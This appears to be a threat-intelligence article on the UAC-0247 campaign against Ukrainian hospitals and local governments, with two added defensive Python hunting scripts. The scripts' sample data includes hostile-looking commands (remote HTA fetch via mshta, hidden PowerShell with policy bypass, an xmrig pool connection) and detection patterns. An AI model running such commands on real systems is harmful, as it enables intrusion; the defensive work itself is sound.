New UAC-0247 campaign steals browser and WhatsApp data from hospitals and governments
A new cyber campaign tied to the UAC-0247 threat cluster has targeted Ukrainian local governments and municipal healthcare organizations, including clinics and emergency hospitals. The operation focused on stealing data from Chromium-based browsers and WhatsApp, while also giving attackers room to move deeper into compromised networks.
The activity took place during March and April 2026, according to CERT-UA. Ukraine’s incident responders said the same cluster also appeared in attacks involving FPV drone operators, which suggests the campaign reached beyond civilian institutions and into sectors with direct wartime relevance.
The entry point was simple. Victims received emails framed as humanitarian aid discussions and were pushed to click a link that either led to an AI-built fake site or to a legitimate site abused through a cross-site scripting flaw. From there, the victim downloaded an archive that started the infection chain.
How the infection chain works
Once the archive was opened, a shortcut file launched the Windows HTA handler through mshta.exe, pulled a remote HTA file, and showed a decoy form while a background task dropped and ran the real payload. CERT-UA also described recent cases that used a two-stage loader, with the final payload compressed and encrypted before execution.
One confirmed case on March 10 used Signal to distribute a file named bachu.zip, which pretended to be an updated version of the BACHU software tool used by FPV operators. CERT-UA said the archive actually contained a DLL that launched AGINGFLY through DLL side-loading as soon as the main executable ran.
The campaign did more than steal files. CERT-UA linked UAC-0247 to CHROMELEVATOR for browser credential theft, ZAPIXDESK for WhatsApp theft, RUSTSCAN for internal network mapping, LIGOLO-NG and CHISEL for covert tunnels, and in one case an XMRIG miner loaded through a modified WireGuard program.
What AGINGFLY gives attackers
AGINGFLY appears to be the main remote access malware in this campaign. Reporting tied to the CERT-UA bulletin says it is written in C# and supports remote command execution, file download, screenshot capture, keylogging, and in-memory code execution, which gives operators both theft and long-term access.
A notable detail is how the malware extends itself after infection. Instead of carrying every command handler inside the main implant, AGINGFLY can fetch source code from its command server and compile that code directly on the infected machine, which gives the operators flexibility without constantly replacing the core malware.
Persistence also matters here. CERT-UA said the attackers used a PowerShell script called SILENTLOOP to run commands, refresh configuration, and pull updated command-and-control server addresses from a Telegram channel, while earlier-stage access could rely on a TCP reverse shell or RAVENSHELL with XOR-encrypted traffic.
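The chain described in this and the previous section (a shortcut handing mshta.exe a remote HTA, a scheduled task that re-launches a script host, AGINGFLY compiling fetched C# on the host, SILENTLOOP reaching Telegram for fresh C2 addresses, and a modified WireGuard build starting XMRIG) maps onto a handful of process-creation patterns. The following is an added example, not CERT-UA's tooling or anything recovered from the campaign: it runs simple rules over constructed Sysmon-style process-creation records and then correlates hits per host. Hostnames, file paths, the Telegram channel name and the IP addresses are hypothetical placeholders.

```python
"""Hunt for the UAC-0247 execution chain in process-creation telemetry.

Added example, not CERT-UA's or the campaign's own code. SAMPLE_EVENTS is
constructed Sysmon-style Event ID 1 data with hypothetical hosts, paths, a
made-up Telegram channel and documentation-range IP addresses.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str    # parent process image path
    image: str     # new process image path
    cmdline: str   # new process command line


# Constructed sample telemetry (hypothetical; not from the CERT-UA report).
SAMPLE_EVENTS = [
    ProcEvent("clinic-ws12", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://203.0.113.5/aid/form.hta"),
    ProcEvent("clinic-ws12", r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden -ep bypass -f C:\Users\Public\loop.ps1"'),
    ProcEvent("clinic-ws12", r"C:\Users\Public\svc.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\x1y2z3.cmdline"'),
    ProcEvent("clinic-ws12", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -ep bypass -c "iwr https://t.me/s/examplechannel"'),
    ProcEvent("gov-fs01", r"C:\Program Files\WireGuard\wireguard.exe", r"C:\ProgramData\wg\xmrig.exe",
              r"xmrig.exe -o 198.51.100.7:3333"),
    ProcEvent("gov-fs01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe notes.txt"),
    ProcEvent("gov-fs01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\ui.hta"),   # local HTA: benign vendor UI
]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
BUILD_TOOLS = {"devenv.exe", "msbuild.exe", "vbcscompiler.exe", "dotnet.exe"}
REMOTE_RE = re.compile(r"https?://|\\\\[^\\\s]+\\", re.IGNORECASE)   # URL or UNC path
TELEGRAM_RE = re.compile(r"\b(t\.me|telegram\.org|telegram\.me)\b", re.IGNORECASE)


def base(path):
    """Lower-case file name of a Windows path (works on any host OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def remote_hta(ev):
    """mshta.exe handed a URL or UNC path: the LNK -> remote HTA stage."""
    return base(ev.image) == "mshta.exe" and bool(REMOTE_RE.search(ev.cmdline))


def lolbin_scheduled_task(ev):
    """schtasks /create whose action is a script host: script-based persistence."""
    cl = ev.cmdline.lower()
    return (base(ev.image) == "schtasks.exe" and "/create" in cl
            and any(h[:-4] in cl for h in SCRIPT_HOSTS))


def runtime_compile(ev):
    """csc.exe launched by something other than a build tool: compile-on-host, as
    AGINGFLY does. PowerShell's Add-Type also spawns csc.exe, so a powershell.exe
    parent is a lower-confidence hit to triage rather than ignore."""
    return base(ev.image) == "csc.exe" and base(ev.parent) not in BUILD_TOOLS


def script_host_to_telegram(ev):
    """A script host contacting Telegram: SILENTLOOP-style C2 refresh."""
    return base(ev.image) in SCRIPT_HOSTS and bool(TELEGRAM_RE.search(ev.cmdline))


def vpn_client_spawns_foreign_child(ev):
    """wireguard.exe starting a binary outside its own directory. Heuristic for the
    modified WireGuard build that loaded XMRIG; tune for the estate's VPN setup."""
    if base(ev.parent) != "wireguard.exe":
        return False
    parent_dir = os.path.dirname(ev.parent.replace("\\", "/")).lower()
    child_dir = os.path.dirname(ev.image.replace("\\", "/")).lower()
    return child_dir != parent_dir


RULES = [remote_hta, lolbin_scheduled_task, runtime_compile,
         script_host_to_telegram, vpn_client_spawns_foreign_child]


def hunt(events):
    """Return (host, rule name, image) for every rule that fires on every event."""
    return [(ev.host, rule.__name__, base(ev.image))
            for ev in events for rule in RULES if rule(ev)]


def hosts_with_chain(events, min_rules=2):
    """Hosts on which at least min_rules distinct stages fired: stronger evidence
    of the full chain than any single rule, which can fire on admin activity."""
    seen = {}
    for host, rule, _ in hunt(events):
        seen.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
    print("chain evidence on:", hosts_with_chain(SAMPLE_EVENTS))
```

hosts_with_chain is the output to act on. Each rule alone (csc.exe under powershell.exe, mshta.exe with a URL, a script host reaching Telegram) will also fire on legitimate activity in some estates, so the allowlists and the min_rules threshold are meant to be tuned, not trusted as shipped.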
Key technical elements at a glance
| Component | Reported role in the campaign |
|---|---|
| Phishing email | Starts the attack with a humanitarian aid lure |
| Fake or abused website | Delivers the malicious archive through an AI-built site or XSS-abused site |
| LNK + HTA chain | Launches the infection through mshta.exe and a remote HTA file |
| AGINGFLY | Main remote access malware used for control and collection |
| CHROMELEVATOR | Steals browser authentication data and stored credentials |
| ZAPIXDESK | Steals WhatsApp data |
| RUSTSCAN | Maps internal subnets and hosts |
| LIGOLO-NG / CHISEL | Creates covert tunnels for movement and access |
| SILENTLOOP | Maintains persistence and updates C2 information |
| XMRIG via patched WireGuard | Shows at least one case where monetization or resource abuse followed compromise |
The bigger issue is not just data theft. This campaign combines phishing, living-off-the-land execution, remote access, lateral movement, and persistence in one chain, which makes it dangerous for hospitals and public institutions that often rely on mixed software estates and limited security staff.
CERT-UA’s advice is direct. Organizations should restrict the execution of LNK, HTA, and JS files, and they should limit or closely control utilities such as mshta.exe, powershell.exe, and wscript.exe, because attackers keep abusing them to blend into normal Windows activity. Microsoft’s own Defender guidance supports that approach through attack surface reduction rules and application control policies aimed at risky script and executable behavior.
What defenders should do now
- Block or tightly restrict LNK, HTA, and JS execution where business operations allow it.
- Review and control the use of mshta.exe, powershell.exe, wscript.exe, and similar script-capable utilities.
- Hunt for unusual scheduled tasks, remote HTA retrieval, and outbound connections to newly observed IP addresses.
- Check endpoints for credential theft from Chromium browsers and for suspicious access to WhatsApp desktop data stores.
- Look for network scanning and tunneling activity tied to RUSTSCAN, LIGOLO-NG, and CHISEL.
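Of the hunting steps above, scheduled-task review is the one most often done by scrolling through Task Scheduler by hand. The following is an added example, not CERT-UA's tooling, that triages Task Scheduler XML (the format `schtasks /query /xml` exports) for actions that invoke script hosts, pull remote content, carry classic evasion switches, or run from user-writable paths. The three task definitions are constructed; the task names other than the Defrag one, the file paths and the URL are hypothetical.

```python
"""Triage exported Task Scheduler XML for script-host-backed persistence.

Added example, not CERT-UA's tooling. Input is the XML that
`schtasks /query /xml` emits; SAMPLE_TASKS is constructed, with hypothetical
task names and paths and a documentation-range URL.
"""
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"   # Task Scheduler schema
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
REMOTE_RE = re.compile(r"https?://|\\\\", re.IGNORECASE)         # URL or UNC path
SUSPICIOUS_ARGS = ("-enc", "bypass", "hidden", "iex", "downloadstring", "invoke-webrequest")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed task definitions keyed by task path. Real exports start with an
# <?xml ... encoding="UTF-16"?> declaration; read those files as bytes.
SAMPLE_TASKS = {
    "\\Updater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2026-03-10T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>mshta.exe</Command><Arguments>http://203.0.113.5/aid/form.hta</Arguments>
  </Exec></Actions>
</Task>""",
    "\\SyncHelper": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-w hidden -ep bypass -f C:\\Users\\Public\\loop.ps1</Arguments>
  </Exec></Actions>
</Task>""",
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments>
  </Exec></Actions>
</Task>""",
}


def exec_actions(task_xml):
    """Yield (command, arguments) for every <Exec> action in one task."""
    root = ET.fromstring(task_xml)
    for ex in root.iter(NS + "Exec"):
        yield ((ex.findtext(NS + "Command") or "").strip(),
               (ex.findtext(NS + "Arguments") or "").strip())


def triage(task_xml):
    """Return the reasons a task deserves a closer look (empty list if none)."""
    findings = []
    for cmd, args in exec_actions(task_xml):
        cmd_base = cmd.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if cmd_base in SCRIPT_HOSTS:
            findings.append("script host action: " + cmd_base)
        if REMOTE_RE.search(args):
            findings.append("remote content in arguments")
        low = args.lower()
        findings += ["suspicious argument: " + tok for tok in SUSPICIOUS_ARGS if tok in low]
        if any(marker in (cmd + " " + args).lower() for marker in USER_WRITABLE):
            findings.append("runs from user-writable path")
    return findings


def triage_all(tasks):
    """Map task path -> findings for every task that produced at least one."""
    flagged = {}
    for name, xml in tasks.items():
        findings = triage(xml)
        if findings:
            flagged[name] = findings
    return flagged


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLE_TASKS).items():
        print(name)
        for f in findings:
            print("   ", f)
```

Against a live host, export a single task with `schtasks /query /tn <name> /xml`, read the file in binary so the declared UTF-16 encoding is honoured, and pass the bytes to triage(). The findings are prompts for a closer look, not verdicts: plenty of legitimate admin tooling schedules PowerShell.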
FAQ
Who was targeted?
CERT-UA says the cluster targeted Ukrainian local governments and municipal healthcare institutions, including clinics and emergency hospitals. Related activity also touched FPV drone operators.
What data did the attackers go after?
The reported focus includes authentication and stored data from Chromium-based browsers, plus data from WhatsApp through a dedicated theft tool called ZAPIXDESK.
How does the attack start?
The attack begins with a phishing lure, then pushes the victim to download an archive. Opening that archive starts a shortcut-and-HTA execution chain that launches the next stage and eventually loads AGINGFLY.
Why is this campaign more than a data-theft operation?
Because it does not stop at stealing credentials. CERT-UA linked the campaign to reconnaissance, covert tunneling, persistence scripts, and full remote access tooling, which means attackers can expand inside a network after the first compromise.